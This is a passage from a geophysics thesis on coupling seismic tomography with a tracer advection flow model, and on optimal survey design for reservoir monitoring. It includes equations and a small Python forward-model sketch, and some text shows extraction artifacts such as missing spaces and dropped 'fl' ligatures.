case the porous media is known as isotropic, where the ow is the same in alldirections. It is otherwise anisotropic.In order to simulate ow using a reservoir model and solve for the pressure p,the permeability k(~x), often referred to as a reservoir parameter function, must be21.1. Reservoir characterizationFigure 1.1: Model of a reservoir with minimal wells. Estimation of the permeability(k(~x)) using only pressure (p) and hydraulic head (z) data of a uid moving withvelocity (~u), collected from sparsely distributed wells will generate highly inaccurateresults.known. However, this function is often unknown and thus must be estimated fromborehole rock samples. In most cases boreholes are expensive to drill, and are thussparsely distributed throughout the reservoir. 
Such sparse sampling leads to inaccurate estimates of $k(\vec{x})$ for the entire region, as values must be extrapolated between boreholes over large distances (Roubinet et al., 2013).

One approach to alleviating this problem is to use historic flow data, measurements of the pressure $p$ and hydraulic head $z$, to estimate the unknown parameter function $k(\vec{x})$. This process is alternately known as parameter estimation, inversion, and, in the oil and gas industry, history matching (Oliver and Chen, 2010; Oliver et al., 2008). The basic idea of history matching is to estimate the reservoir parameters such that simulated flow data fits measured data.

Technically, the inversion process is rather challenging as it involves the discretization of a system of partial differential equations, the solution of the forward problem (flow simulation), the computation of the gradients of the simulator with respect to the parameters, and the solution of an optimization problem. An excellent review of the process can be found in (Oliver and Chen, 2010).

Although it is possible to estimate the reservoir parameters through inversion and predict flow data, these estimates can be a highly inaccurate representation of the reservoir. This inaccuracy stems from the large null space of the inverse problem associated with the highly sparse spatial sampling of reservoir flow data.

To overcome the null space issue, subspace techniques have been applied, where the reservoir parameters are restricted to "live" in a small subspace spanned by a (relatively) small number of vectors (Abacioglu et al., 2001; Gerritsen and Durlofsky, 2005; Oliver and Chen, 2010; Sarma et al., 2013). This approach decreases the variance in the recovered estimates of $k(\vec{x})$ by increasing the bias of the estimated reservoir parameters (Tenorio, 2001).

A different approach to reduce the variance of the recovered reservoir parameter models is to simply add additional flow data and further sample the reservoir. While this is clearly one of the better ways to reduce the uncertainty in the estimates, it is not practical, as it is unlikely that many more wells will be drilled just to improve the simulation capability. However, assuming that the geophysical rock properties of the reservoir (density or electrical conductivity, for example) will change with fluid flow implies that geophysical survey techniques can potentially be used to map these changes. This makes geophysics for reservoir characterization a practical method to increase data collection coverage without having to drill additional wells.

1.2 Geophysics for reservoir characterization

Geophysical survey techniques measure variation in the geophysical properties of the subsurface by systematically collecting geophysical data over a large spatial surface grid and within existing boreholes. Geophysical data are not only valuable on their own for detecting variation in the subsurface, but can also be inverted to obtain an image of the underlying geophysical property distribution. Thus, geophysical data can complement reservoir flow data by providing a denser grid of measurements than the subsurface flow data obtained from point locations at well sites alone (Hubbard and Rubin, 2000). For example, Figure 1.2 provides an example of a geophysical survey with data, $d_i$, collected at the surface (orange dots).
Sensors could additionally be placed in the existing boreholes to further increase data numbers and depth of investigation.

Figure 1.2: Model of a reservoir with geophysical survey measurement locations depicted in orange. Changes to the geophysical model parameters $m(\vec{x})$ can be estimated through inversion of the densely sampled geophysical data ($d_i$).

The spatial resolution and depth of investigation of geophysical data depend predominantly on the choice of technique. Applied geophysical surveys are a widely used method of imaging the subsurface in resource exploration. Therefore, there are many well developed survey types available for imaging subsurface flow. In particular, time lapse seismic surveys, ground penetrating radar, time lapse gravity measurements, and electromagnetic imaging techniques have been used for oil reservoir and aquifer characterization for some time (Alumbaugh and Morrison, 1995; Archie, 1942; Hubbard and Rubin, 2000; Lumley, 2001a; Vasco et al., 2004; Vesnaver et al., 2003).

As an example, gravity methods, which are sensitive to shallow changes to the density of the subsurface rock, are a common choice in hydrology applications. Water aquifers tend to be small and close to the surface, and thus gravity methods can detect small variations in density as water is depleted; see for example (Alumbaugh and Morrison, 1995; Slater et al., 2000; Wilt et al., 1995). In this case the measured geophysical data consist of small changes to the local gravitational field above the aquifer.

Oil reservoirs, in comparison, are often large, flat, not necessarily close to the surface, and commonly discovered using seismic techniques. Thus seismic surveys are frequently the first choice for monitoring programs (Lumley, 2001b). Additionally, electromagnetic methods are attractive for monitoring injected fluids because the electrical conductivity of the injected fluid can be controlled. For example, the injected fluid can be selected such that its conductivity maximizes the conductivity contrast between the existing media and the introduced fluid. This then generates a greater signal in the measured electric and magnetic potential data.

Although geophysical surveys are an excellent method for imaging changes in the geophysical properties of the subsurface, inferring reservoir parameter functions from geophysical data or from recovered images of the geophysical property models is not so straightforward. The use of geophysics for inferring reservoir parameters, sometimes known as geophysical history matching, rests on the assumption that a mathematical relationship (petrophysical relationship) between the geophysical properties and the reservoir parameter function(s) exists and is known. Historically, much work has been done to determine these relationships (Archie, 1942; Mavko et al., 2009). Although these relations tend to be empirical and site specific, they have been successful in progressing geophysical history matching workflows.

A second point of concern in the geophysical history matching process is that most often the mathematical geophysical model and the reservoir fluid model are decoupled. Thus, the inversion process is decoupled. This decoupled inversion process has a major shortcoming; since geophysical imaging is almost always ill-posed, the accuracy of the imaging is typically low.
Estimating the reservoir model parameters from the geophysical images alone, or in combination with low resolution models obtained from inverting fluid flow data, can yield inaccurate and biased estimates.

To address this shortcoming, Hubbard and Rubin (2000) propose several parameter estimation approaches using statistical geophysical-hydrological techniques to characterize an aquifer with geophysical and hydrological data. One particular technique takes a Bayesian iterative approach where the flow log-permeability (a commonly measured reservoir parameter) is first estimated through inversion of sparse hydrological data. This estimate is considered to be a random variable with a probability distribution, and is then used as a prior distribution for the Bayesian inversion of geophysical data. Geophysical data, along with the known parameter relationships, are then inverted to recover an update to the log permeability while including the prior permeability estimate. Alternately, several geostatistical approaches have been proposed to match structures within images of differing parameters to geologic data from core samples, or to maximize correlations. These approaches suffer from the same parameter function requirements and lower resolution biased estimates (Cassiani et al., 1998; Doyen, 1988; Pollock and Cirpka, 2012).

In oil reservoir monitoring practice, seismic history matching is the predominant method (Abul, 2010; Emerick and Reynolds, 2012; Gosselin et al., 2003; Lumley, 2001b; Mezghani et al., 2013; Nenna et al., 2011; Oliver and Chen, 2010; Sarma et al., 2013; Trani, 2012; Vasco et al., 2004). Similar to the geophysical-hydrological techniques, seismic history matching involves estimating geophysical properties through inversion of geophysical data, mapping the estimated geophysical property model to a reservoir parameter model through a physical property relation, and finally
In the context of geophysical history matching, Kalman\fltering is derived from an inverse problem that simultaneously minimizes the geo-physical measurement error and the error in the ow model simulation.Kalman \fltering, and ensemble Kalman \fltering (EnKF) (Evensen, 1994), haverecently been proposed as alternative approaches to seismic history matching as theycouple the reservoir model and geophysical model (Abul, 2010; N\u001avdal et al., 2002;Nenna et al., 2011; Vauhkonen et al., 1998). The Kalman \flter (also known as theKalman gain matrix) couples the geophysics, the dynamics, and the prior error co-variance matrices. However, its use for geophysical imaging of ow requires a phys-ical parameter relationship. Additionally, the large dense covariance matrix which81.2. Geophysics for reservoir characterizationcharacterizes the prior distribution must be known, and is propagated in time. Forproblems such as seismic imaging, where the data set and the parameter space arelarge, Kalman \fltering becomes computationally infeasible as a result of the storageand computation with the dense covariance matrices. To alleviate this, stochasticmethods such as the EnKF were developed to approximate the covariance matrices.The EnKF method is a Monte Carlo type sequential Bayesian inversion method\frst proposed by Evensen (1994) to reduce computations and memory. The EnKFmethod introduces ensembles of state (parameter models) and measurement vectors(geophysical data for example) sampled from Gaussian distributions such that theprior state covariance matrix can be approximated by computing the covariance ofthe ensemble set. This reduces the inverse problem to the dimension of the ensem-ble. Abul (2010) found that there is promise in EnKF methods for reservoir historymatching, however, it was limited by uncertainty in the initial condition and errorestimates, and by the computation required for integration of large amounts of da-ta and the non-linearity introduced through the relationship between reservoir andseismic parameters.In a similar avour to Kalman \fltering, there has been some recent researchto couple non-linear geophysical imaging with ow models in the hydrogeophysicscommunity through regularization of the geophysical inverse problem with the owmodels, with promising results (Cockett and Haber, 2016; Hoversten et al., 2006;Steklova and Haber, 2015). These approaches are di\u000berent in that they were developedfor speci\fc ow models, require Archie's law, are not solved iteratively, and havespeci\fcally tailored regularization terms. Additionally, the inversions are carried outfor all times, therefore incorporating all historic data in one inversion.In light of current reservoir monitoring practice, there is room to improve up-on coupled geophysical imaging and subsurface ow inversion methods for reservoirmonitoring.91.3. Optimal survey designIn addition to coupling geophysical survey methods to estimate ow model param-eters, there is reason to consider optimizing the geophysical survey design to adaptto the ow dynamics, such that the best estimates of the reservoir parameters areobtained from a coupled inversion.1.3 Optimal survey designWhile the coupled ow and geophysical inverse problem can potentially provide betterestimates of reservoir parameter functions through inversion of large geophysical datasets, the geophysical data collection can also be designed in an optimal way. 
Forexample, if one is interested in monitoring the progression of a uid front as it movesthrough a reservoir, collecting geophysical data far downstream may not contributeany additional information to the inversion, and thus those measurements could beexcluded. In the context of reservoir monitoring, an optimal experimental designmight amount to adding or eliminating a well location as demonstrated by Gharamtiet al. (2015), or reducing the number of surface measurements from a maximumallowable set.In many realistic scenarios, the ow dynamics are su\u000eciently slow to allow forimproved designs after a \frst experiment has been conducted. This is particularly truewhen monitoring ow in reservoirs where uid velocities can be so slow that changesoccur over months or even years (Vasco et al., 2004). Additionally, the availablehistoric experimental data and inversion results will contain valuable informationabout the subsurface. This information should thus be included when determiningan optimal survey design for a future survey.The mathematical method of determining an experimental design is known asoptimal experimental design (OED), and has existed for some time for both the well-posed and ill-posed parameter estimation cases (Aggarwal et al., 2015; Ajo-Franklin,101.3. Optimal survey design2009; Atkinson and Donev, 1992; Bardow, 2008; Chaloner and Verdinelli, 1995; Curtis,1999; Fedorov, 1972; Haber et al., 2008, 2010, 2011; Huan and Marzouk, 2013; Lucero,2013; Pukelsheim and Studden, 1993).Typically, optimal experimental designs are computed by minimizing the error inthe estimated parameter model according to some speci\fed criteria. In this case themodel estimate is assumed to be the mean of a distribution with a covariance matrixcharacterizing the error. The type of design method depends on the optimality criteriaapplied to the covariance matrix. There are several standard optimality criteria; forexample, A-optimal design minimizes the trace of the covariance matrix or averagevariance, D-optimality minimizes the determinant of the covariance matrix, and E-optimality minimizes the eigenvalues of the inverse covariance matrix.There are some optimal design methods which consider dynamic systems, yetthere is little in the way of optimal design algorithms for ill-posed inverse problemswhere the model is governed by a dynamical system. Although there has been workon sequential design for the well-posed case, no work is known for the ill-posed case,(see the following for examples: (Cherno\u000b, 1972; Khodja et al., 2010; Papalambrosand Wilde, 2000; Wilkinson et al., 2015) and references within). In some cases,static design methods can be applied to time dependent partial di\u000berential equations(PDEs) (Alexanderian et al., 2014; Haber et al., 2011), this approach results in ana-priori estimate of the designs for \\all times\" which depend only on informationprovided in the form of a regularization (or prior) to the ill-posed problem. Forexample, (Alexanderian et al., 2014) compute optimal designs for a tracer advection-di\u000busion reservoir model. This example however, did not include any geophysicalimaging, nor was any historic data included in the experimental design computation.There has been some work applying optimal design methods to the Kalman \fl-ter (Gharamti et al., 2015; Sagnol and Harman, 2014); for example, Sagnol and Har-man (2014) propose a D-optimal design method for the Kalman \flter, which results111.4. 
Thesis objective and outlinein designs dependent on the posterior state estimation covariance matrix. Alter-nately, Gharamti et al. (2015) present an optimal method for selecting aquifer welllocations to track the ow of a contaminant plume. In both cases, the prior covariancematrix to be minimized includes the transition matrix (a discretization of the dynam-ics), but the designs still do not depend on historic data, and thus these approachesare no di\u000berent then the application of static methods.In fact, as far as can be discerned from the literature, apart from sequentialdesign approaches (Cherno\u000b, 1972; Khodja et al., 2010), which use the posterior modelestimate and its posterior covariance as the prior for the design at the next time step,current design techniques for linear inverse problems do not utilize information thatis collected at early times in order to design experiments at later times. This is aconsequence of optimizing over the posterior variance in the model estimates.For any linear ill-posed inverse problem, static or dynamic, the posterior covari-ance matrix will only depend on the physics of the problem, and the linear regulariza-tion operator (or prior distribution covariance matrix for the Bayesian perspective),regardless of how the inverse problem is formulated. Thus, in order to include historicdata to a standard optimal design problem, the posterior covariance matrix must bereconsidered.1.4 Thesis objective and outlineThe main objective of the research presented in this thesis is to improve reservoir mon-itoring and forecasting by coupling geophysical survey techniques with a dynamic uidow reservoir model and optimally designing the data collection in the geophysicalsurvey.Coupling the geophysics and ow model in one inverse problem allows for theestimation of uid parameter functions such as the permeability k(~x) from geophysical121.4. Thesis objective and outlinedata. To address the coupling problem, careful consideration of the choice of thereservoir uid ow model and its discretization is taken such that knowledge of thephysical parameter relationship is not necessary. Additionally, error in the reservoirmodel is assumed to be zero. This is contrary to the usual assumptions. In this way,the geophysical inversion problem will be reformulated as an ill-posed inverse problemwith appropriate regularization terms that is constrained by the uid ow model.Since the geophysical survey provides a much denser sampling of data, the uncertaintyin the recovered ow model parameter function is reduced and thus provides betteraccuracy when forecasting ow.Optimally designing the geophysical survey for the coupled problem, while in-cluding historic survey data, produces a survey that adapts with the dynamics of thereservoir while reducing the number of measurements required. This research buildson A-optimal sparsity constrained design algorithms presented in (Haber et al., 2011)for large-scale ill-posed inverse problems, by introducing a monitor function to thedesign optimization problem to include historic data.The main body of the thesis consists of \fve chapters. 
Since the same geophysical survey and flow model are used to demonstrate the ideas in the proposed research, the thesis first outlines these models, and then presents the new ideas.

To this end, Chapter 2 introduces the seismic tomography geophysical imaging survey and the tracer advection flow model chosen to represent a simplified reservoir monitoring scenario, presents a mathematical argument for not requiring a physical property relationship between the models, and details the discretization of the two model PDEs.

Chapter 3 outlines the decoupled linear inversion process and discusses the issues with coupling the two differing physical models. In particular, consideration must be taken when characterizing the error in each of the models, as this leads to very different formulations of the coupled inverse problems.

Chapter 4 presents the seismic tomography tracer advection coupled inverse problem, formulated to solve for the fluid velocity field and the initial tracer concentration within the reservoir. Because of the ill-posed nature of the problem, special consideration of the regularization terms required to solve the problem is discussed. In particular, this chapter highlights the construction of a unique regularization function for the fluid velocity field. Due to the non-linearity of the regularization functions, solutions to the inverse problem are not so straightforward. This chapter therefore details the discretization of the regularization and the optimization of the inverse problems, and finally presents results for the tomography tracer advection model. The objective of the example is to show that estimates of the initial tracer distribution and fluid velocity field are improved as new geophysical data are obtained, and that forecasting improves as a consequence.

Chapter 5 details the formulation of the adaptive A-optimal experimental design method for two cases of the error characterization in the dynamic fluid flow model. The new formulation proposes the addition of a monitor function in the definition of the posterior covariance matrix of the estimated model parameters. The non-linearity of the resulting optimization problem requires iterative solution techniques, which are outlined in Section 5.3. The adaptive design method is then demonstrated for the coupled seismic tomography tracer advection reservoir monitoring example for both cases of the error characterization. The results show that experimental designs computed using this method adapt to the flow within the reservoir while still providing sufficient data for optimal recovery of tracer distributions.

Chapter 6 summarizes the key findings of the research presented in this thesis, discusses the practical contributions, and comments on areas of future work.

Chapter 2
A model reservoir monitoring experiment

To demonstrate the research ideas presented in this thesis, a simple model of a reservoir monitoring scenario is used throughout. The model consists of a seismic tomography survey to image the reservoir, and a tracer advection flow model to characterize the subsurface fluid flow dynamics.

Although there are several choices when considering geophysical surveys for monitoring subsurface flow, such as gravity surveys or electrical methods, borehole seismic tomography surveys provide a good starting point for monitoring a reservoir. In particular, the tomography survey utilizes already existing boreholes for source and receiver locations, while receivers can be placed on the surface to expand the measurement area.
It has also been established that seismic wave velocity is sensitive to changes in rock fluid properties (Alumbaugh and Morrison, 1995; Nolet, 1987; Oliver and Chen, 2010), and thus the data are sensitive to flow. An additional benefit is the linearity of the governing equations. The measured tomography data are a linear mapping of the subsurface rock's seismic properties, which can be inverted to recover a spatial image of the properties. Thus imaging the seismic wave velocity involves solving a fairly straightforward linear inverse problem.

There are several well established and researched models describing flow within a reservoir, such as two-phase flow models or a black oil model, among many others. See (Chen et al., 2006) for an excellent outline of flow models. However, many of these models are complicated and can be discretized with only a limited number of techniques, with time step and spatial discretization length restrictions. Since the goal is to couple the flow model and the geophysical model to form an already computationally expensive ill-posed inverse problem, it is not beneficial at this stage of proof of concept to incorporate more physically accurate, and computationally difficult, models.

Although the tracer advection model might seem like an unlikely choice for simulating flow within a reservoir, there is some justification: the tracer itself can be thought of as an analogy to a second phase (a fluid differing from the already present fluid) moving in a reservoir, and the model mathematically resembles two-phase flow models (Chen et al., 2006). In reality, the tracer advection model is a single phase flow model. Also, at very long time scales, where an injected fluid front might take months to move even a few meters, it is not necessary for the purposes of this research to incorporate a model that characterizes minute changes. Additionally, in hydrology, tracer experiments are common practice for estimating aquifer parameters such as hydraulic conductivity, and have been used in conjunction with seismic tomography surveys in the past (Hyndman et al., 1994).

Practically, from a computational perspective, the tracer advection model's linearity lends itself to a variety of discretization techniques, including unconditionally stable Lagrangian particle-in-cell methods. A second benefit becomes clear in Section 2.3, when discussing physical parameter relationships and coupling the flow model with the geophysical imaging.

This chapter introduces the governing partial differential equations (PDEs) for the tomography survey experiment and the tracer advection model, discusses the relationship between the different physical properties of the two PDEs, and finally presents a discretization of the resulting governing system of equations.

2.1 Geophysics: seismic tomography

Classical travel time tomography uses ray paths to model travel times, and so assumes that the data are of high frequency, meaning the wavelength is at least several times smaller than the spatial variations of the velocity model (Yilmaz, 2013).

A typical 2D seismic tomography experiment places $n_s$ sources on one side of the region to be imaged and $n_r$ receivers on the other. Travel times of an acoustic wave traveling from source to receiver constitute the measured data, where the ultimate goal is to recover an image of changes to the distribution of physical properties generating changes in these data. A schematic of the seismic experiment is illustrated in Fig. 2.1.
Figure 2.1: Tomography setting: sources ($s_i$) and receivers ($r_j$) are placed in two boreholes, and the travel times of an acoustic wave traveling along adjoining ray paths $\Gamma_{i,j}$ are measured.

Mathematically, the travel time data are calculated by integrating the inverse of the acoustic wave velocity, also known as the slowness, $m(t,\vec x)$, over a ray path $\Gamma_{i,j}$. The travel time along the ray path from the $i$th source to the $j$th receiver is given by

\[ d_{i,j}(t) = \int_{\Gamma_{i,j}} m(t,\vec x)\, d\ell, \tag{2.1} \]

where $m \in \mathcal M$ is the slowness model belonging to the subspace $\mathcal M$. Assuming a layered earth with homogeneous isotropic porous rock layers, the ray paths the waves follow will be linear and independent of the slowness (this is true for small perturbations in the slowness field). Thus, the problem can be cast as a linear inverse problem for $m(t,\vec x)$ (Jones, 2010).

Given noisy data vectors $d(t)$ measured at times $(t_0,\dots,t_n)$, Equation (2.1) can be written as

\[ F\, m(t_k,\vec x) + \epsilon_k = d(t_k), \tag{2.2} \]

where $d$ is an $n_s \times n_r$ vector of real numbers, $F : \mathcal M \to \mathbb R^{n_s \times n_r}$ is the forward mapping operator, and $\epsilon_k$ is the measurement error. The receivers, or modern seismometers, measure tiny displacements in the earth. These instruments use electronic sensors, amplifiers, and recording devices, which can cover a wide range of frequencies. In general, the first arrival time and initial displacement of the earth is measured successively many times over a very short interval and stacked, such that the measurement is given as a continuous random variable with error $\epsilon_{i,j} \pm \sigma_{i,j}$.

2.2 Dynamics: tracer advection

The tracer advection equations, as presented in (Chen et al., 2006), describe the transport of a solute in a fully saturated fluid phase under the assumption that fluxes due to dispersion and diffusion are small relative to the advective transport of the solute. The motion of a tracer with conserved concentration $c$ (volumetric fraction in the fluid phase), in a fluid of density $\rho(t,\vec x)$, with spatial and temporal variables $\vec x, t$ respectively, is described by the following relation,

\[ \frac{\partial (c\rho)}{\partial t} + \nabla\cdot(c\rho\,\vec u) = 0, \quad \text{s.t. } c\rho(0,\vec x) = c_0\rho(\vec x), \tag{2.3a} \]

where the flow field $\vec u$ satisfies

\[ \nabla\cdot\vec u = q, \tag{2.3b} \]
\[ \vec u = -K(\vec x)\,\nabla p, \tag{2.3c} \]
\[ p(0,\vec x) = p_0(\vec x), \tag{2.3d} \]

accompanied by either Dirichlet or Neumann boundary conditions for the pressure $p$. The fluid velocity field $\vec u$ is determined by Darcy flow in this approximation, where only the hydraulic conductivity $K = k(\vec x)/\mu$, a function of the permeability $k$ and the fluid viscosity $\mu$, and the pressure gradient describe the flow field. Recalling Equations (1.1b), the gravitational term has been excluded on the assumption that it is very small in comparison to the pressure gradient. This implies that pumping rates are high enough to generate significant pressure within the reservoir. Note that Equation (2.3b) implies that what flows in flows out within the entire domain, such that the source pumping rate in is equal to the pumping rate out, $q_{\rm in} = q_{\rm out}$. Thus the rock is assumed to be incompressible, such that no fluid is stored. The tracer advection model is illustrated in Figure 2.2.

In a typical reservoir characterization setting, one would collect pressure and concentration measurements and invert these data to recover $K(\vec x)$. However, assuming the presence of the tracer generates a change in the seismic wave velocity, the idea is to first estimate $\vec u$, and later estimate $K$. To do this, the petrophysical parameter relationship between $c(\vec x)\rho$ and the seismic slowness $m(t,\vec x)$ must be considered.
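To make the linear measurement model of Equation (2.2) concrete, the following is a minimal sketch, not taken from the thesis, of simulating travel-time data $d = Fm + \epsilon$ on a regular grid. It assumes the simplest possible geometry: horizontal straight rays between facing source-receiver pairs at equal depths, so each ray intersects every cell in its row with segment length $h_1$. Grid sizes and the noise level are illustrative.

```python
# Sketch of the straight-ray travel-time forward problem, Eq. (2.2).
import numpy as np
import scipy.sparse as sp

rng = np.random.default_rng(0)
l1, l2 = 20, 10              # cells across (x) and in depth (y)
h1 = 1.0                     # cell width (m)
M = l1 * l2                  # number of model cells

# One horizontal ray per depth row: row j of F holds the intersection
# length h1 for every cell in grid row j (row-major cell ordering).
rows, cols, vals = [], [], []
for j in range(l2):
    for i in range(l1):
        rows.append(j)
        cols.append(j * l1 + i)
        vals.append(h1)
F = sp.csr_matrix((vals, (rows, cols)), shape=(l2, M))

m = np.full(M, 1.0 / 2500.0)          # background slowness (s/m)
m[3 * l1:5 * l1] = 1.0 / 2000.0       # a higher-slowness (slower) layer

eps = 5e-4 * rng.standard_normal(l2)  # Gaussian measurement noise
d = F @ m + eps                       # noisy travel times
```

For the crosswell geometry of Figure 2.1, every source-receiver pair contributes a ray, and each row of $F$ instead stores the lengths of that ray's intersections with the cells it crosses, as detailed in Section 2.4.1.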
Figure 2.2: Tracer advection: a tracer of concentration $c$ is advected in a fluid of density $\rho$ with velocity field $\vec u$. The hydraulic conductivity $K$ determines the velocity field given a pressure gradient within the reservoir.

2.3 Physical parameter relations

In order to use geophysical techniques to estimate fluid flow parameters through inversion of geophysical data, there must be a relationship between the flow parameters and the geophysical rock properties, also known as a petrophysical relationship. One famous petrophysical function, known as Archie's law, relates the electrical conductivity of a sedimentary rock to its porosity and brine saturation (Archie, 1942). In this way, changes in saturation will result in changes to the electrical conductivity, a property that governs the flow of electric current in the presence of an electric field. However, Archie's law is an empirical relation that is site dependent and requires significant laboratory work, and so it cannot be generated for the general case (Archie, 1942; Gosselin et al., 2003). Many empirical relations between seismic velocities and rock porosity have also been developed (Abul, 2010; Mavko et al., 2009). However, these are also rock and site specific, and are often highly nonlinear.

For the seismic tomography experiment, it may be that in the presence of the tracer the seismic slowness changes relative to areas where no tracer is present. Thus, it is assumed that the tracer $\hat c = c\rho$ and the seismic slowness $m$ are related such that a petrophysical relationship $m(\hat c)$ exists; however, given the choice of flow model, it is not necessary to know $m(\hat c)$.

To see this, consider the case where the flow is divergence free, such that $\nabla\cdot\vec u = 0$. The fluid velocity model, Equation (2.3b), typically has a very sparse right hand side, with delta functions at the injection and extraction points. Therefore, the flow field is divergence free almost everywhere within the reservoir.

Recalling Equation (2.3a), the equation describing the advection of the tracer is

\[ \frac{\partial \hat c}{\partial t} + \nabla\cdot(\hat c\,\vec u) = 0. \]

Now, assuming that the only source of change to the subsurface rock comes from the transport of the tracer, the "transport" of the seismic slowness is governed by the same conservation law, as follows,

\[ \frac{\partial m(\hat c)}{\partial t} + \nabla\cdot\big(m(\hat c)\,\vec u\big); \]

applying the chain rule to the first term and expanding the divergence term yields

\[ \frac{\partial m(\hat c)}{\partial \hat c}\frac{\partial \hat c}{\partial t} + \vec u^{\top}\nabla m(\hat c) + m(\hat c)\,\nabla\cdot\vec u. \]

Expanding the gradient term and recalling the assumption $\nabla\cdot\vec u = 0$ gives

\[ \frac{\partial m(\hat c)}{\partial \hat c}\frac{\partial \hat c}{\partial t} + \vec u^{\top}\frac{\partial m(\hat c)}{\partial \hat c}\nabla \hat c, \]

and finally, factoring out $\partial m(\hat c)/\partial \hat c$ while recalling that Equation (2.3a) is equal to zero,

\[ \frac{\partial m(\hat c)}{\partial \hat c}\left(\frac{\partial \hat c}{\partial t} + \vec u^{\top}\nabla \hat c\right) = \frac{\partial m(\hat c)}{\partial \hat c}\,(0) = 0. \]

Thus, it can be concluded from this result that the transport equation describing the flow of the tracer can also be used for the "transport" of the slowness.
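The commutation behind this argument can also be checked numerically. The following toy sketch (illustrative, not from the thesis) advects a 1-D periodic tracer with a semi-Lagrangian step using linear interpolation, and compares transporting $m(\hat c)$ against applying the petrophysical map to the transported tracer. An affine map $m(\hat c) = a + b\hat c$ is assumed, for which the two operations commute exactly because the interpolation weights sum to one; all values are illustrative.

```python
import numpy as np

n, u, dt = 200, 1.3, 0.05
x = np.linspace(0.0, 1.0, n, endpoint=False)
c = np.exp(-200 * (x - 0.3) ** 2)            # initial tracer "plume"

def advect(f):
    """One semi-Lagrangian step: trace back along u*dt, interpolate linearly."""
    xb = (x - u * dt) % 1.0                   # departure points (periodic)
    idx = np.floor(xb * n).astype(int)
    w = xb * n - idx                          # linear interpolation weights
    return (1 - w) * f[idx] + w * f[(idx + 1) % n]

a, b = 4.0e-4, 1.0e-4                         # assumed affine map m(c) = a + b*c
lhs = advect(a + b * c)                       # transport the slowness
rhs = a + b * advect(c)                       # transport the tracer, then map
print(np.max(np.abs(lhs - rhs)))              # ~1e-16: machine precision
```

For a general non-linear $m(\hat c)$ the discrete operations agree only up to interpolation error, but the continuous argument above shows the underlying transport law is identical, which is the property exploited later when coupling the models.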
This feature of the tracer advection model is particularly advantageous, as it eliminates the necessity of knowing the petrophysical relationship between the tracer and the seismic velocity.

Given the two models, the discretization is now outlined in the following sections.

2.4 Discretization

The numerical discretization of the geophysical imaging and the flow dynamics is presented in three parts: the discretization of the tomography experiment (Equation (2.2)), the tracer advection (Equation (2.3a)), and the fluid conservation law (Equation (2.3b)).

For simplicity, the discretization is restricted to a two-dimensional setting where the computational domain $\Omega = [0,L_1]\times[0,L_2]$ is rectangular, and divided into $l_1$ by $l_2$ rectangular cells of edge lengths $h_1 = L_1/l_1$ and $h_2 = L_2/l_2$.

2.4.1 Discretization of the tomography equation

To discretize the tomography experiment with discrete data $d_k$ measured at times $k = 1,\dots,n$, the line integrals in (2.1) are approximated by summing over line segments $dl_k$. That is, the approximation of the integral in Equation (2.1) for the travel time $d_{i,j}$ of a wave traveling along the ray path $\Gamma_{i,j}$ between the $i$th source and the $j$th receiver is

\[ d_{i,j} = \int_{\Gamma_{i,j}} m(t,\vec x)\, dl \approx \sum_{k=1}^{p} m_k\, dl_k, \]

where $p$ is the number of cells that $\Gamma_{i,j}$ intersects in the mesh, $m_k$ is the value of the slowness at the cell center of the $k$th cell, and $dl_k$ are the line segments of $\Gamma_{i,j}$ passing through each cell respectively.

Thus, the discrete tomography experiment can be written as a linear system

\[ F m_k + \epsilon_k = d_k, \qquad k = 1,\dots,n, \tag{2.4} \]

where the entry $F_{ij}$ is the length $dl_k$ of the intersection of $\Gamma_{i,j}$ with the $k$th cell. The cell centered values of the grid are stored in the vector $m$.

The operator $F: \mathbb R^M \to \mathbb R^N$ maps from the model space to the data space, $N = n_s \times n_r$ (number of sources $\times$ number of receivers), and thus $d_k$ is an $N\times 1$ vector of discrete travel time measurements, and $m$ is an $M\times 1$ vector of seismic slowness values with units of s/m.

2.4.2 Discretization of the mass balance

Since vector operators such as the curl and divergence will be used later, a Marker and Cell (MAC) (Fletcher, 2012) grid is chosen for the discretization of the fluid velocity vector field $\vec u$ and the initial seismic slowness $m_0$. The MAC method is discretized on an Eulerian staggered grid system, and is a finite difference solution technique for investigating the dynamics of an incompressible viscous fluid. One key feature is the use of Lagrangian virtual particles, whose coordinates are stored, and which move from one cell to the next according to the latest computed velocity field (McKee et al., 2008).

Figure 2.3: A grid cell with length $h_1$ and height $h_2$, slowness value $m_j$ located at the cell center, and components of the fluid velocity flowing in ($\vec u = [u_1^{+}, u_2^{+}]$) and out ($\vec u = [u_1^{-}, u_2^{-}]$) on the cell edges.

Figure 2.3 pictures a cell in the grid, where $\vec u = [u_1, u_2]$ is discretized on the cell faces, and $m$ at the cell centers using a cell-centered grid function $m_0$. This yields an approximation of the divergence in the cell-centers using short differences.

2.4.3 Discretization of the flux-balance conservation

A finite volume discretization of the flux-balance equation $\nabla\cdot\vec u = q$ on a staggered grid is obtained by using the divergence theorem,

\[ \int_{V_{\rm cell}} \nabla\cdot\vec u\; dV = \int_{S_{\rm cell}} \vec u\cdot\vec n\; dS, \]

where $V_{\rm cell}$ is the volume of the cell, and $S_{\rm cell}$ is the cell surface area. The vector $\vec n$ is the unit normal vector to the surface.
See (Haber and Ascher, 2001) for further details.

Referring to Figure 2.3, the divergence over a cell with dimensions $h_1\times h_2$ in the mesh can be expressed as

\[ (\nabla\cdot\vec u)_{\rm cell} \approx \frac{h_2(u_1^{-} - u_1^{+}) + h_1(u_2^{-} - u_2^{+})}{h_1 h_2}, \]

where $u_i^{+}$ is the magnitude of the flux into the cell and $u_i^{-}$ is the magnitude of the flux out of the cell in the $i$th coordinate direction. This leads to the following standard discretization of the divergence,

\[ \mathrm{DIV}\, u = q, \quad \text{where } \mathrm{DIV} = \begin{pmatrix} I_{l_2}\otimes d^{\,l_1}_{l_1+1} & \; d^{\,l_2}_{l_2+1}\otimes I_{l_1} \end{pmatrix}, \tag{2.5} \]

where $\otimes$ is the matrix Kronecker product, $I_l \in \mathbb R^{l\times l}$ denotes the identity matrix, $l$ is the number of cells in the respective direction, and $d^{\,l}_{l+1} \in \mathbb R^{l\times(l+1)}$ is a short finite difference matrix; see (Modersitzki, 2009) for more details about the implementation. The discrete divergence operator maps from the faces of the mesh to the cell-centers.

2.4.4 A Particle-In-Cell method for flow simulation

